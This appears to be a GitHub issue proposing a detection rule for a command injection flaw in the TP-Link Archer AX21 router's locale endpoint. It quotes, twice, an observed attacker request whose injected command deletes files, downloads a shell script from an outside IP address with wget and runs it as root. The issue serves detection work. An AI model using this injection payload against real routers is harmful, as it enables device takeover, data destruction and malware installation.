You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
A security vulnerability was identified in the TP-Link Archer AX21 (AX1800). This vulnerability involves a command injection flaw present in the country form of the /cgi-bin/luci;stok=/locale endpoint within the web management interface. The issue arises from inadequate sanitization of the country parameter during a write operation, leading to its use in a call to popen(). Consequently, an unauthorized attacker can exploit this vulnerability by sending a simple GET request to inject arbitrary commands. The injected commands run with root privileges, posing a risk to the system's security.
I have seen this exploit query in my client environment recently.
Attacker command:- /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm -rf *; cd /tmp; wget hxxp://45.142.214.108/tenda.sh; chmod 777 tenda.sh; ./tenda.sh)
Description of the Idea of the Rule
A security vulnerability was identified in the TP-Link Archer AX21 (AX1800). This vulnerability involves a command injection flaw present in the country form of the /cgi-bin/luci;stok=/locale endpoint within the web management interface. The issue arises from inadequate sanitization of the country parameter during a write operation, leading to its use in a call to popen(). Consequently, an unauthorized attacker can exploit this vulnerability by sending a simple GET request to inject arbitrary commands. The injected commands run with root privileges, posing a risk to the system's security.
I have seen this exploit query in my client environment recently.
Attacker command:-
/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm -rf *; cd /tmp; wget hxxp://45.142.214.108/tenda.sh; chmod 777 tenda.sh; ./tenda.sh)
Public References / Example Event Log
https://voyag3r-security.medium.com/exploring-cve-2023-1389-rce-in-tp-link-archer-ax21-d7a60f259e94
The text was updated successfully, but these errors were encountered: